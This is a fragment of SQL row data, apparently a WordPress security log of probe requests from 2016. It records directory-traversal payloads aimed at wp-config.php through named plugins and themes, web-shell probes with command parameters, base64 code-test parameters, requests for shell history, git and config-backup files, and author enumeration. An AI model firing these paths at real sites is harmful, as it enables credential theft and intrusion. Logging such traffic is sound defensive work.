(0xa37d9fc54afaf88467e3dc2366dad531, 1478226864, '/wp-content/plugins/history-collection/download.php?var=../../../wp-config.php'),
(0x8df495fad7e36389703ca68d1fbe4e78, 1478249139, '/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=../../../wp-config.php'),
(0x33bd8f20c8ec1bfcfabb2184a9ce15f9, 1478275206, '/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php'),
(0xdd986d09f9bd646379cc24b5ef72d53e, 1478309726, '/wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php'),
(0x86c0d7ad6de69d87aaffe34cc4da3e79, 1478327072, '/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url../../../../wp-config.php'),
(0x65d12c078a96208ef8b27e60e7735bb5, 1478335294, '/wp-content/force-download.php?file=../wp-config.php'),
(0xcb32c806f062b12c644f1e4748b8aaf5, 1478355201, '/wp-content/themes/modular/lib/scripts/dl-skin.php'),
(0xa5561265af7a0a20f406acce90ebf05d, 1478372712, '/wp-content/themes/epic/includes/download.php?file=../../../../wp-config.php'),
(0xcaad691db2a6c1a99ede821a0ba684fc, 1478401975, '/wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php'),
(0xd0cd8cee8896b042f84a03f163ee27bc, 1478433728, '/wp-content/plugins/mainwp-child/readme.txt'),
(0xa12b86aa663d5e1116567443cf64336d, 1478704038, '/wp-content/uploads/68928575.php'),
(0x60990e69728614cd2e8d340137abaedf, 1478704040, '/72545552.php'),
(0x785eb0878a10bf664354f3a221cf295c, 1478704042, '/wp-content/plugins/revslider/temp/update_extract/89973456.php'),
(0xd9cfeeba1966493586642b5ec1ff5493, 1478704043, '/03338556.php'),
(0xf66124e21958cbcd66904e70a4d2294d, 1478704044, '/wp-content/plugins/Login-wall-etgFB/login_wall.php?login=cmd&z3=NDYzNDYxNTYucGhw&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8%3d'),
(0xe37a52f8166a0e944b5d4d9a4460782b, 1478704045, '/wp-content/plugins/46346156.php'),
(0xa8ee1fccdf7d78c0bc23da0594c3c6c5, 1478751019, '/images/xxx.php'),
(0x549f29c16d6551116de3d61cd5ad1036, 1478751019, '/wp-main.php'),
(0x072d8a19475791a211ebac0834190da8, 1478751025, '/wp-content/plugins/myshe.php'),
(0xf268a08d2f67258f67d755aaa4b5eda9, 1478751186, '/tmp.php'),
(0x9a247f269610586f560fbec85c1bb103, 1478751212, '/wp-admin/ajax-module.php'),
(0xf8c3fd4b60dfc71a0b2bdcb3d13e17c9, 1478751293, '/maill.php'),
(0xff35fbd32b68387d4c5e58df3442f391, 1478751522, '/administrator/includes/readmy.php'),
(0x996d9210a908672194109ece155d00d0, 1478834391, '/wp-config.php~'),
(0xc6168315e62174906cf23334655018e3, 1478853615, '/sites/default/files/up.php'),
(0x4e9faec9f002b7c5517595085b9460a1, 1479048370, '/wp-config.php.bak'),
(0xb78f23b70bda5328ac283cc978ecaecd, 1479078161, '/wp-content/plugins/wp-mobile-detector/'),
(0xdfd51d941489c77548239efafbc507c5, 1479317115, '/xmlrpc-activate.php'),
(0x36cc45715d6e6eda841459f18b1c8c21, 1479406433, '/wp-content/plugins/revslider/settings/?wphp4'),
(0x3046df56565a347fa1feab332a406d0e, 1479406438, '/wp-content/plugins/revslider/settings/?php4'),
(0xfdbe1d47364c3592dca641b44dd38152, 1479406439, '/wp-includes/Text/Tiff.php?php4'),
(0x07bbef7147b80e12de199062e9bb427c, 1479406474, '/wp-includes/Text/Tiff.php?wphp4'),
(0x8d6723459e77908e8b7248e0b27e3906, 1479420080, '/wp-content/themes/wp-conns.php'),
(0x9df310ad8113180710f4221348a1f174, 1479420087, '/wp-content/plugins/wp-conns.php'),
(0x6489f6b479181ad3a8f55b9387c245b8, 1479657557, '/wp-content/themes/skinizer/framework/_scripts/valums_uploader/php.php'),
(0x0b185f5e7434140d4c85d079fc87b2e7, 1479703979, '/JasperFitch.php?login=cmd'),
(0xd53d6ad53dda3ae957b0d64b5071993e, 1479746494, '/Good-404-Sorry.php'),
(0x3b0f40bc3d9ed2b4600ddfaca58710b3, 1479755326, '/wordpress/wp-login.php'),
(0x74c36da8b264408ba37c4797d3418ef6, 1479757272, '/wp/wp-login.php'),
(0xac0715c83ec7ea2fa656c7c8456eaeb8, 1479763032, '/wp-content/plugins/contact-form-7/login.php?login=cmd'),
(0x2f5fabbf3e552e4bbd193d240a159bba, 1479765610, '/main/wp-login.php'),
(0x0bb2ca1f6c0e2ebe18abf3c63dc4ed46, 1479765614, '/blog/wp-login.php'),
(0x41ed755c6e76f8982513c3a9c4e9c636, 1479767007, '/en/wp-login.php'),
(0xf58a40b18823ebce3857ddbb3134bb44, 1479770175, '/new/wp-login.php'),
(0x81b328f2694d11e0b6e835dbc75b847a, 1479776727, '/home/wp-login.php'),
(0x01f8a91bbced1952346f2673bcda9520, 1479784246, '/cms/wp-login.php'),
(0x3db1e6b84741920a1e985f70297c3955, 1479791898, '/blogs/wp-login.php'),
(0x3619aff575f13f0ca2797ee07b6b0888, 1479795209, '/site/wp-login.php'),
(0x1e5839a12ab22eeef761b7389b4c3476, 1479800210, '/news/wp-login.php'),
(0xc486b9dd495993eb7d66e98bbd00d502, 1479804520, '/wp-admin/includes/images.php?php4'),
(0x08f690b0b76d1d28fd6261add0aa18af, 1479804520, '/wp-admin/includes/images.php?wphp4'),
(0x105470c620a8441142d660daa227a021, 1479806860, '/web/wp-login.php'),
(0xf459d989f3666fcdd23d9423e0d75a54, 1479829546, '/test/wp-login.php'),
(0x8cdf3f07fa8f7843ec1bf97cf0f6bd0a, 1479946325, '/ccontacts'),
(0xf6976b0ecee7af633a01036b8bc3ce0d, 1479990954, '/wp-includes/class-comments.php?blog=comments&title=American%20Power%20and%20Gas%20Reviews'),
(0x81f95a84517d4a6a65191e5c29a19c84, 1480048668, '/_db_backups/setup.php'),
(0x6f658ca94c719851351f9c853f613a40, 1480051550, '/uploadify.php'),
(0x49b35a69165989fae67461de0ce49996, 1480096158, '/wprpc.php'),
(0x09dd5ccdf8413e483bc124e19f13bb8f, 1480268038, '/header.php'),
(0x8cfb789e85c9142f9898acbc03bf7d60, 1480268058, '/functions.php'),
(0x57bcdb022f394b5e117c7c830a806d37, 1480268157, '/general.php'),
(0x50fecc3d0197e0d51eba1836cb18b7e0, 1480268168, '/config.php'),
(0xdf6158b19a9fca5fdc8f81782a2b1d0f, 1480268444, '/system.php'),
(0xb9709a8782ad87971a34ca65b0def0e1, 1480268449, '/dir.php'),
(0x28652e70de996e7f443c29b35d83c8c1, 1480268636, '/title.php'),
(0x3936da11a975f5a8fe7b7e19784e09eb, 1480268836, '/include.php'),
(0xbf6813c2bc0becb369a8d8367b6b77db, 1480268841, '/test.php'),
(0x12ae6f9d1b5fc2cccb5be4cfbc8ec4f5, 1480268864, '/options.php'),
(0x4b539dee918bd974a6acf29c4a2512ec, 1480269027, '/search.php'),
(0x63d41975b36dcd68f3a48b0e73811687, 1480269270, '/xml.php'),
(0xef8800d274f68cd0dcd206c53dd21c9b, 1480269473, '/alias.php'),
(0xb9c58337c29b7523b5e3a2e15a4b32b9, 1480269725, '/option.php'),
(0xaa89293c289e7e159c453fffa9ace76c, 1480269752, '/login.php'),
(0xa84e3a32a66bf3cee6bb017436b487d1, 1480269907, '/page.php'),
(0x13c3181b519f55c8ca9249a6666bd22c, 1480270006, '/ajax.php'),
(0xb4cc8f96e1e20388b11c254710993baa, 1480270016, '/footer.php'),
(0x29580c6493ca39a7271491226ec9fe69, 1480270127, '/list.php'),
(0x0f1c2383d168c790ad8897fcc5621321, 1480270472, '/proxy.php'),
(0x83d26b0a798140d14370abff8a671768, 1480270493, '/object.php'),
(0x9cacdc41584eee6c312b42508a42eea5, 1480271095, '/diff.php'),
(0x15d2c7b2a033980c29d07b0b6613d2f7, 1480271246, '/start.php'),
(0xd8c9fb40a1da079f57e76afb83b93faa, 1480271421, '/utf.php'),
(0x2f973843eef493bac71b92e8218487ff, 1480271567, '/article.php'),
(0xaac58fbc7c675b159dbd88957df7e7b2, 1480271660, '/global.php'),
(0x12a8f47978f4534bebe546b861222767, 1480271881, '/db.php'),
(0x4a1c5930747a4258115a7226cc1dc29e, 1480271897, '/session.php'),
(0x38d5cd7bab40e2bde0976a52e15a18ac, 1480271994, '/user.php'),
(0xc1ca88c3cfeb95739d953c17e58d0e51, 1480272017, '/themes.php'),
(0x64336e03b96eb461d3fe32fad77fa5db, 1480272060, '/template.php'),
(0x5587624e9b779ca4e0d94058289e1bfc, 1480272307, '/inc.php'),
(0x1cf403fc6cd812850fdfc1f392047b10, 1480272646, '/lib.php'),
(0x4286ae48554ea08e822f265aea7a829d, 1480272781, '/blog.php'),
(0x75ff1f43dbc45fd9e997e7cc90a715f5, 1480272924, '/files.php'),
(0xa8c731916fc452f017bea731a895a851, 1480273039, '/gallery.php'),
(0xa418bc921798a0059dcac6c4145cf924, 1480273355, '/menu.php'),
(0x883357c77b7d9539938f814aeb93f14d, 1480273366, '/sql.php'),
(0x768e1841bcd3f05111abad41996fb035, 1480273546, '/file.php'),
(0x0e3835bb030269058bc3667e6751ce42, 1480273660, '/model.php'),
(0x751b46a83f276bdacf136a8e2ee9f345, 1480273718, '/info.php'),
(0x0d37e98b7ed1721ebec9c93da3a5ed05, 1480273812, '/dirs.php'),
(0x66f7d6f15eb6c0f3c7dcad789c17bd26, 1480274041, '/press.php'),
(0x3d97b2d5ee0595ead58748952f8673b7, 1480274246, '/plugin.php'),
(0xcd524ce2155d5a6dab04a3f9ad7dde60, 1480274329, '/ini.php'),
(0x4bb4f86a48d3d592c337555e791b7868, 1480274381, '/dump.php'),
(0x75a0028bb6377f925af5b881108a4592, 1480274929, '/error.php'),
(0xe59095d3329e54edb8d1ddf4050d6093, 1480274975, '/view.php'),
(0x1d8b957e17bb2c834f1bd12ecf015ac3, 1480274982, '/javascript.php'),
(0xed4b0882e334898da97de388b4b473c1, 1480275045, '/help.php'),
(0xb6b3ddd5d79bff38f6be1d6289b7ad15, 1480275619, '/defines.php'),
(0xbfda4cd463a2553bc6ab4fcb6697f505, 1480275630, '/code.php'),
(0x48ccffb7541decb5a3584c2136ba19de, 1480275958, '/css.php'),
(0x44847813b760100c68a23f30b0dbddd6, 1480350877, '/wp-content/uploads/2016/08/config.php'),
(0x719af452122c79404742a6071c4d59a5, 1480350877, '/wp-content/uploads/2016/10/config.php'),
(0x3b2472ff596c83477bd639cd6d5e721c, 1480350877, '/wp-content/uploads/2016/06/config.php'),
(0xb158303c3237dcce16c8e5ca8824e826, 1480350877, '/wp-content/uploads/2016/05/config.php'),
(0x87daf775fd5d187976ba826cb51c344a, 1480350877, '/wp-content/uploads/2016/02/config.php'),
(0x70e77d8f5675c2a9334056235fd1de31, 1480350877, '/wp-content/uploads/2016/09/config.php'),
(0x56a5584a50edf3ba4f67bd7c26008671, 1480350877, '/wp-content/uploads/2016/07/config.php'),
(0x20bb7e817e4def598283133cc5def6fb, 1480350877, '/wp-content/uploads/2016/03/config.php'),
(0xc09d5ec1ea4446c4ce208f6117e4bdbf, 1480350877, '/wp-content/uploads/2016/04/config.php'),
(0xea718e8296fa4c6ceead5bb5940d0bda, 1480350878, '/wp-content/uploads/2016/01/config.php'),
(0xc104897ee82c900ec57055409a029ea1, 1480350878, '/wp-content/uploads/2016/11/config.php'),
(0x64e8f950c2ce288a10c269f4175985f4, 1480376207, '/ajax-requests.new.php'),
(0x311ab7be2a9aeaa484f254c6a3951050, 1480450650, '/wp-includes/js/tinymce/plugins/textcolor/ajax-requests.new.php'),
(0xee36650a1a0cfd16d8a2fba0173902d8, 1480475954, '/wp-content/themes/amoveo/includes/fileuploader/upload_handler.php'),
(0xa145406e2912b2df6cade5e76b83bf99, 1480532066, '/wp-smtp.php?c'),
(0xbca75779f6ded1650d3bf2c079f5520e, 1480589752, '/wp-content/themes/photocrati-theme/style.css'),
(0xd913a2a40c9e66ecc6145ef7d7c9bcf0, 1480609826, '/wp-smtp.php?up'),
(0xf35e8030845635e31abd5257942300bb, 1480634056, '/feed/magpie_debug.php'),
(0x91fa8057819ff2f1db29b1e4183de09b, 1480647144, '/wp-content/plugins/hb-audio-gallery-lite/readme.txt'),
(0x269631c794864c50b98363f67f98d73d, 1480647149, '/wp-content/plugins/memphis-documents-library/readme.txt'),
(0x5d877d24f46164e04ebb82ef89b1fa7e, 1480717235, '/wp-content/themes/photocrati_/style.css'),
(0x6195f59d95b7264622ba9453ec002bfd, 1480739466, '/error-logs.php'),
(0x064990a45872f5a76f2d95a1e5b6882a, 1480739847, '/sfn.php'),
(0x42b583c66a41666928987b2b7ca85e3b, 1480739945, '/cod.php'),
(0x1d663839ab05d3a207af3263f25168de, 1480759106, '/11.php'),
(0x31606b22a671b84630f70afc2a0990a5, 1480759422, '/wp-includes/class-comments.php?blog=1'),
(0x39074969aa16a9888a2b5136a179cdd6, 1480759618, '/wp-content/plugins/sfn.php'),
(0xd78a12b2d80de778bc6efeff482ae2da, 1480759810, '/wp-content/plugins/Materialnlns.php'),
(0x9159ee617446fca051c0cc9d498791be, 1480773815, '/vmskdl44rededd'),
(0x41fa16c63c7b77c757d92a214ad0d9e8, 1480773817, '/N0Wccvvd333.php'),
(0x1f4be918116ffc9b3c7117e19082bf8f, 1480773819, '/N0WaY/N0WaY1bb2/N0WaY123.php'),
(0x7453a23d0e81e073f91ee55c6a73d1bb, 1480773863, '/?author=11'),
(0x28187e9d15f0e4319ef41be9fe187c8f, 1480773865, '/?author=12'),
(0x1e97448de343cfc7af187cb7a59cdc3b, 1480773866, '/?author=13'),
(0x968a3eeb05f54774f02814e59fea774a, 1480773868, '/?author=14'),
(0xcb54b9cfec4c235db326d4218a730070, 1480773869, '/?author=15'),
(0x06e897b69e7a7c7fc2dcb1a28c826070, 1480773871, '/?author=16'),
(0xc25636af628cb6026e05eabdf4a56051, 1480773873, '/?author=17'),
(0x3f1860a99b2d0cb7892c0d1b94719002, 1480773874, '/?author=18'),
(0x996f8c6d1aa7a7a3f72511e410721d9a, 1480773875, '/?author=19'),
(0x76cc0bd6e9a6f9044bd5b6785ba4e78f, 1480773876, '/?author=20'),
(0xa0988256097fc79dbda3f60762564ed0, 1480773877, '/?author=21'),
(0x7334ef3237e5a26e6c9dc56756219f4b, 1480773878, '/?author=22'),
(0x8940d57319c2525dbe3d37a091eaf877, 1480773879, '/?author=23'),
(0x1d832bdb528c3bedb28baba74a77741e, 1480773880, '/?author=24'),
(0x12e0afe6918f1591c0b36ce2174c9ef9, 1480773881, '/?author=25'),
(0x5dabe41f7a3358d9d624a85d321ec042, 1480773882, '/?author=26'),
(0xdc28ea33de5f68477ba23586cc5fb437, 1480773883, '/?author=27'),
(0x20aa7d2d3c6d569f321cff32dd4aafee, 1480773884, '/?author=28'),
(0x8a5f5559f6299a94389269fa6d9a6a01, 1480773885, '/?author=29'),
(0xfe7fffb6b89447210a72cb3759fcf1e0, 1480773885, '/.nksdjs'),
(0x4d1950ddc556f05178173c92368e8893, 1480773886, '/.bash_profile'),
(0x0a2fea3de13fc866be03d9a7b3c8ca42, 1480773887, '/.bash_history'),
(0x94d8c65d46e9e47c045a8860a9098603, 1480773888, '/.bashrc'),
(0xa4acabc54edf179b0f68d27e6abc471d, 1480773889, '/.db_config'),
(0x663d83a4afdafe58f3b7a2c1f8b40607, 1480773890, '/.default'),
(0x5b45af00f738a66c2eb16a6d0a4d177e, 1480773891, '/.logs'),
(0x3bc96a0135c9b76ae5ecf07409fd7752, 1480773892, '/.old'),
(0xbced465ae33ce0d38506e517b91a301b, 1480773893, '/.private'),
(0x2996f1ae5349569cf506b5a6d488d0b6, 1480773894, '/.queries'),
(0x722220dc042e17eaf3e2264741c52309, 1480773895, '/.query'),
(0x8e01d69175cc3bc06ee846c0f724c07d, 1480773896, '/.secret'),
(0x9da7f543764a823a76a19decba0c0274, 1480773897, '/.sql'),
(0x73f3c0d8bc48271ed302deeff128454e, 1480773898, '/.temp'),
(0xf3300ddd47599fec2ffc672e151e6847, 1480773899, '/.git/HEAD'),
(0x98413616be76ca2adb60d2de52405fde, 1480773900, '/phpinfo.php'),
(0xc0f0357c3effc3e9b604afd9bc4c58e3, 1480773901, '/pinfo.php'),
(0x29ca779b93912379bd997ae3005837b9, 1480791486, '/wp-content/upgrade/theme-compat/popup-pomo.php'),
(0x46024fd5b6b72b3b0564665abc42de1c, 1480848054, '/wp-content/themes/photocrati-theme-v4/style.css'),
(0x03a4c240d7e9ee2b7231c8928255a0ee, 1480848054, '/wp-content/themes/photocrati-theme-v4.071/style.css'),
(0xca11c4c94bdadb827ff14ddd2842a03e, 1481078342, '/wp-content/themes/photocrati_/admin/README.txt'),
(0x00c40461503b46fcb89c7cd9b68a4690, 1481197264, '/wp-content/themes/photocrati-theme-v4.071/admin/README.txt'),
(0x05ed8fec7dbd3f4b456035af2e55761a, 1481216365, '/wp-content/plugins/cherry-plugin/admin/css/cherry-admin-plugin.css'),
(0x19aaf7def10fed4bf772cadcb039ef6c, 1481335095, '/wp-content/themes/photocrati-theme-v4/admin/README.txt'),
(0x14c7e2bcb6f1ef85bc4376dbd69a9633, 1481336049, '/wp-includes/css/modules.php'),
(0xd7f0599dafd1dca1eb9aecd3613f6d00, 1481383893, '/wp-content/plugins/text-hover/text-hovers.php'),
(0xd87841b7dd026619a18ca41e1abfe8d8, 1481523883, '/wp-content/plugins/delete-all-comments/readme.txt'),
(0x5bf10b4cae79b7839135e7fb8cb545f6, 1481560083, '/popup-pomo.php'),
(0x18d0c6f4797c8ebdda328d24935e98e3, 1481596845, '/wp-content/themes/WPLocalPlaces/style.css'),
(0xc828380fd593e4f319ea4fc1ff833a55, 1481715425, '/wp-content/themes/brainstorm/functions/jwpanel/scripts/uploadify/uploadify.css'),
(0x35b26f3c6d85d1137cefc87788b8ef8a, 1481749282, '/pxdruahv'),
(0xa56753b7ccd4ae86969b9b1b24367215, 1481888412, '/wp-import.php'),
(0x1208679ab48992c76a89a9eae9f32d19, 1481969225, '//wp-content/plugins/woocommerce-product-options/includes/image-upload.php'),
(0x03633ae466629237785ea88e6381d443, 1481991374, '/wp-content/uploads/files/guest/wp-cache.php'),
(0xc1156122e1417449de964e216749fb71, 1481991375, '/wp-content/uploads/2016/12/wp-cache.php'),
(0xb395cb4d0d400ba47b9635ac71c150ce, 1481991376, '//modules/mod_simplefileuploadv1.3/elements/udd.php'),
(0x0bf0516ce5cc12c25f0fe354332fb9e0, 1481991377, '/modules/mod_simplefileuploadv1.3/elements/wp-cache.php'),
(0x054514f6853a100a8671c5050456936b, 1482110498, '/up.php'),
(0xd1a78c254881154cf35c24db2b25de35, 1482365457, '//wp-content/plugins/delete-all-comments/delete-all-comments.php'),
(0x9e0725f2794499fd44e071c2501ac00a, 1482376571, '/wp-content/plugins/radykal-fancy-gallery/admin/generate-code.php'),
(0x48d853f626b4e8fd2b291a79e4e7d2b8, 1482516189, '/update.php'),
(0x7a1dbc371194af7e120346167c6e91c0, 1482542096, '/cms/uploadify/uploadify.swf'),
(0x5c90d3b44885626a6a60dddf11bf63d6, 1482542096, '/uploadify/uploadify.swf'),
(0x18e6c295d6ccceb9805955e7113670bd, 1482542096, '/admin/uploadify/uploadify.swf'),
(0xef9e7e7c527d59fdf238114415e2b0e0, 1482542096, '/lib/uploadify/uploadify.swf'),
(0xef14bc7bf1a71959d6c84d6ef2b87b12, 1482542096, '/includes/uploadify/uploadify.swf'),
(0xb49f82ba620a57058045b82de78b22b9, 1482542096, '/inc/uploadify/uploadify.swf'),
(0xee2b79819a90edd89e395ec5f2aaafd2, 1482542096, '/plugins/uploadify/uploadify.swf'),
(0x0fdd42491511951af63a516fc5bcb49d, 1482542096, '/js/uploadify/uploadify.swf'),
(0xff48c6c25956ef176e172b80c055d1a1, 1482609522, '/upload.php'),
(0x9c53c53cc4c2b65c02043dfbb639672f, 1482638400, '/wp-content/plugins/contus-video-galleryversion-10/upload1.php'),
(0xed118b880552d13be989ffe06b7dc8ee, 1482649592, '/404error.php'),
(0x6a70ee533add1ec03b016fbe868079d6, 1482768690, '/Configss.php?check'),
(0x127bc0bf8eeef2b26195bc6fbb45ebd6, 1482778971, '/wp-content/themes/figero/scripts/doajaxfileupload.php'),
(0x0e82e79bc114d5009ce28370cf3f7cf9, 1482804510, '/wp-content/plugins/wpshop/includes/ajax.php'),
(0x58319501b87036780f838f4ea52fb806, 1482806399, '/wp-content/themes/wumblr/themify/js/utils.js'),
(0xd5d50af7c5cc01e43924b6877caeb48c, 1482875931, '/wp-content/plugins/front-end-upload/lib/plupload/examples/upload.php'),
(0xf53d0f7604814535df2be333777ab7d4, 1482884629, '/wp-content/plugins/peugeot-music-plugin/js/plupload/examples/upload.php'),
(0x074c0483eb829476e0129adf8b9fc9dd, 1482901667, '/wp-content/plugins/formcraft/file-upload/server/php/index.php'),
(0xeb50cfd631633c31240442f63534cfd5, 1482924756, '/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php'),
(0x9d375354fa7cd4dee6b125e68423a96c, 1482925479, '/wp-content/themes/bloggie/themify/js/utils.js'),
(0x4751b2828c75871aed8a625fef1e3e68, 1482937151, '/wp-content/plugins/acf-frontend-display/js/blueimp-jQuery-File-Upload-d45deb1/server/php/index.php'),
(0xeaf1abc6369c6022286ec72dc396e195, 1482959712, '/wp-content/plugins/wp-post-frontend/js/plupload-2.1.2/examples/upload.php'),
(0x66a2e7c12fd0b52de70ca69b99a49c69, 1482967607, '/libraries/wp-conns.php'),
(0xba151fac1e227f3cb92fae7692eb73cd, 1482967706, '/components/wp-conns.php'),
(0x5ff4fae303d841704cfe34b13873dd8c, 1482967728, '/modules/wp-conns.php'),
(0x191b5c3b94bcab2ab54da09f85a18a5d, 1482967757, '/wp-conns.php'),
(0x54e87310886c648bb6ae7230d73f1737, 1482968178, '/templates/wp-conns.php'),
(0x3f9fee3cee419410d7ee955f5db4dd7c, 1482968318, '/administrator/wp-conns.php'),
(0xc7011b86e6cb52685bb7e31cf331da98, 1482968507, '/plugins/wp-conns.php'),
(0x0b280651d1b213abc5fe237870d0c8dc, 1482968549, '/wp-admin/wp-conns.php'),
(0xaff3ab4c90e9fd7691939f33ed438a2a, 1482968750, '/wp-includes/wp-conns.php'),
(0xb1601881c24bf6976d65b89661e01875, 1482968816, '/wp-content/wp-conns.php'),
(0x7df2cef39018f8161c495af12c050701, 1482969148, '/wp-content/uploads/wp-conns.php'),
(0x2518f465b621f1b2e4221c142ac2a1c1, 1482973289, '/wp-content/common.php'),
(0xfd56b5a492976502cbcd60b5329f34d0, 1482973444, '/wp-snapshots/tmp/mssqli.php'),
(0xbd5c24b7aedc5400a4d6c18421a3aae2, 1482973502, '/wp-content/themes/twentytwelve/inc/mssqli.php'),
(0xcf5a6a039e422f80ef26a4dfe9a21259, 1482973564, '/wp-content/main_.php'),
(0xc82f364fc58b4fee472ab04e26d1ae26, 1482973613, '/wp-content/plugins/hello-dolly/mssqli.php'),
(0xa585695b8f190875691950fd9f68f915, 1482973731, '/wp-includes/css/mssqli.php'),
(0xea7709692ca28750935d616c5300821b, 1482973833, '/common.php'),
(0xfc6e909dcd5cd3e7995688fbc4ca1ba0, 1482974034, '/wp-content/wfcache/phoenixtechsolution.com_portfolio-3/mssqli.php'),
(0x7e289b76cc74b867589bbe08a71ad6d6, 1482974035, '/wp-content/fmp-jw-files/configs/mssqli.php'),
(0x87f760bc6ba663bc344e7933de542423, 1482974309, '/wp-includes/theme-compat/mssqli.php'),
(0x1e1629cc27a000c8df3afd13c05d83fd, 1482974693, '/wp-content/uploads/2013/07/mssqli.php'),
(0x227b8a3460062a69f4d00e01bd627ade, 1482974932, '/wp-content/uploads/quarantine/mssqli.php'),
(0x4f55b636cd71df5b244ccdcab5f2c71a, 1482975140, '/wp-content/plugins/maintenance-mode/languages/mssqli.php'),
(0xd67c327a24a16f3d18020936614084e4, 1482975522, '/monte.php'),
(0x89c062d889bae521e518a5ff1f96e846, 1482975704, '/wp-admin/maint/mssqli.php'),
(0xecd34e2ad15016d00b022714ce4b082e, 1482976173, '/wp-content/monte.php'),
(0xf3e4ce047fef312e57694e4cbccbcdaf, 1482976553, '/wp-content/uploads/mssqli.php'),
(0x95540cd3356df38bb47b33b2f347d159, 1482976846, '/wp-includes/fonts/mssqli.php'),
(0x29e5e58023b4c35877c01a12910b5679, 1482976999, '/wp-content/uploads/sucuri/mssqli.php'),
(0x81bd75a7168a80ec5f6417414aedae5b, 1482977629, '/wp-includes/theme-compat/productid/mssqli.php'),
(0xd871307186cf10094f96f257579967ff, 1482979055, '/adodb.class.php?array=cHJpbnQoJzcwODQ3NGZnNjVhMDE4NTQzbzcxYzZhNzQ5Y2M0OGUzJyk='),
(0xaa7cc785b35f05fb1d478824f1275af3, 1482979139, '/wp-content/plugins/adodb.class.php?array=cHJpbnQoJzcwODQ3NGZnNjVhMDE4NTQzbzcxYzZhNzQ5Y2M0OGUzJyk='),
(0x696cfe068732732ed4f9567417e600b9, 1482979279, '/wp-content/adodb.class.php?array=cHJpbnQoJzcwODQ3NGZnNjVhMDE4NTQzbzcxYzZhNzQ5Y2M0OGUzJyk='),
(0x418ec2a212cf1e2e8c101bfe10ba3c1b, 1482979305, '/modules/adodb.class.php?array=cHJpbnQoJzcwODQ3NGZnNjVhMDE4NTQzbzcxYzZhNzQ5Y2M0OGUzJyk='),
(0x42822feb305061c124ec4c35742bd49a, 1482979479, '/libraries/adodb.class.php?array=cHJpbnQoJzcwODQ3NGZnNjVhMDE4NTQzbzcxYzZhNzQ5Y2M0OGUzJyk='),
(0x1ca0f3155e23973bfa171c3f1d8ca404, 1482979494, '/wp-admin/adodb.class.php?array=cHJpbnQoJzcwODQ3NGZnNjVhMDE4NTQzbzcxYzZhNzQ5Y2M0OGUzJyk='),
(0x075060b57dafffe5927cf56a503590c1, 1482979572, '/plugins/adodb.class.php?array=cHJpbnQoJzcwODQ3NGZnNjVhMDE4NTQzbzcxYzZhNzQ5Y2M0OGUzJyk='),
(0x355b5209cdc1bba9368f5ada7e312115, 1482979644, '/wp-includes/adodb.class.php?array=cHJpbnQoJzcwODQ3NGZnNjVhMDE4NTQzbzcxYzZhNzQ5Y2M0OGUzJyk='),
(0xc5baa2e5a1062e158056e54329848630, 1482979765, '/templates/adodb.class.php?array=cHJpbnQoJzcwODQ3NGZnNjVhMDE4NTQzbzcxYzZhNzQ5Y2M0OGUzJyk='),
(0x3a89412f1b61adb12c44c85a7e105654, 1482979995, '/wp-content/plugins/levelfourstorefront/scripts/administration/dbuploaderscript.php'),
(0x84ecb7a809244678e586f1c6a504d5ac, 1482980051, '/wp-content/plugins/levelfourstorefront/products/wp-classes.php'),
(0xd1d243e8b00ad3d5df2d6e6cb7cccd27, 1482981003, '/administrator/adodb.class.php?array=cHJpbnQoJzcwODQ3NGZnNjVhMDE4NTQzbzcxYzZhNzQ5Y2M0OGUzJyk='),
(0xd570f0ac0b2c73a47ad17e576f72b94f, 1482981008, '/wp-content/uploads/adodb.class.php?array=cHJpbnQoJzcwODQ3NGZnNjVhMDE4NTQzbzcxYzZhNzQ5Y2M0OGUzJyk='),
(0x7c3dae7069e9188ffdf9444f77af4df7, 1482981068, '/components/adodb.class.php?array=cHJpbnQoJzcwODQ3NGZnNjVhMDE4NTQzbzcxYzZhNzQ5Y2M0OGUzJyk='),
(0xa1c8cb2c94dbaf884e2aee26c2ad7c8d, 1482981109, '/wp-content/themes/adodb.class.php?array=cHJpbnQoJzcwODQ3NGZnNjVhMDE4NTQzbzcxYzZhNzQ5Y2M0OGUzJyk='),
(0x4e58898da63b5d54cb769d48e9d81c6d, 1482986208, '/wp-content/plugins/use-your-drive/includes/jquery-file-upload/server/php/index.php'),
(0x063d5af7b48e9036129600dec399f3c8, 1482994826, '/wp-content/plugins/the-viddler-wordpress-plugin/js/plupload/examples/upload.php'),
(0xe380ea99880dd923ed63e10be861d49b, 1483022188, '/wp-content/plugins/ubh/up.php'),
(0x596ae36163b8932a895266f27dafb531, 1483038078, '/wp-content/plugins/ultimate-product-catalogue/product-sheets/wp-classes.php'),
(0x1c063928a520b5ac060acbb033a60df6, 1483059289, '/wp-content/plugins/malapascua-agency/js/plupload/examples/upload.php'),
(0xcfa49ab5028d5c7cf0cf051c41898395, 1483068630, '/license.php.suspected'),
(0x7b1e22f4f98c59b599a4304d9985faf6, 1483075285, '/wp-content/plugins/sexy-contact-form/includes/fileupload/index.php'),
(0x560f9ff6d865718867bf0591b67df964, 1483095056, '/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php?Year=2016&Month=02'),
(0x2740024c93c65442f998e9733412c74d, 1483116037, '/wp-content/plugins/front-end-editor/lib/aloha-editor/plugins/extra/draganddropfiles/demo/upload.php'),
(0x21ac36a093c645585f4c70e03e0c677b, 1483116122, '/wp-content/plugins/front-end-editor/lib/aloha-editor/plugins/extra/draganddropfiles/demo/wp-classes.php'),
(0xf62f65a7c576ed72015c57a2013dbd5c, 1483269272, '/wp-content/plugins/downloads-manager/page-download-template.tpl'),
(0x7a7da57bc0832a2542f28d58fee18f63, 1483461298, '/wp-admin/include.php'),
(0x5047d9990bb2a7a804f059a9857c2ff6, 1483461311, '/wp-includes/dir.php'),
(0x3211836ae2d14d759e34181dd0607ff7, 1483461330, '/wp-includes/diff.php'),
(0xc453809ccd1695bcbed899dca1b121f4, 1483461433, '/wp-admin/page.php'),
(0x6273d364eea9d52db12aeed65ef110c1, 1483461461, '/wp-content/diff.php'),
(0x5568ff458fdfdde5764f25806908d0d0, 1483461643, '/wp-includes/ajax.php'),
